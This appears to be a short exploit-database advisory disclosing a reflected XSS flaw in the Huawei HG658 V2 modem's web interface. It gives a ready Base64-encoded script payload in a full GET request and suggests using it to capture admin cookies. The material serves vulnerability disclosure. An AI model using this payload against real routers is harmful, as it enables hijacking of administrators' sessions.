Huawei HG658 V2 Cross Site Scripting Vulnerability

🗓️ 08 Mar 2017 00:00:00Reported by KnocKoutType

zdt🔗 0day.today👁 121 Views

Modem Web Interface XSS Vulnerability on HUAWEI HG658 V

HUAWEI HG658 V2 => Modem Web Interface Reflected XSS Vulnerability
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Discovered by: KnocKout
[~] Contact : [email protected]
[~] HomePage : http://cyber-warrior.org
############################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Hardware/Web App : HUAWEI
|~Affected Version : HG658 V2
|~Official Web: http://www.huawei.com
####################INFO################################

the same network with a social engineering scenario
is on the modem manager to do the admin cookies can be captured

########################################################
----------------------------------------------------------
HTTP://192.168.1.1/html/pub/WanConnectionInfo.html?origin=[Base64 XSS Code]

Proof image: http://i.hizliresim.com/EgqAkv.png

----------------------------------------------------------
                      Request
----------------------------------------------------------
GET http://192.168.1.1/html/pub/WanConnectionInfo.html?origin=Ij48c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmNvb2tpZSk8L3NjcmlwdD4=

Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: username=admin; SessionID_R3=CaRyWGufAmjwkbRbn0HTfRFZ0GqzVM6y38r0r0NvID0BPc5prfJNScondh34nopeC0dRFiPtEx4IpngNmkZ6te9tlWDKk8Hoolzo2FjW5nu3BeUn5uAb0k1FDgQG2zH
Connection: keep-alive
Upgrade-Insecure-Requests: 1
If-None-Match: R5

#  0day.today [2018-01-04]  #

08 Mar 2017 00:00Current

7.1High risk

Vulners AI Score7.1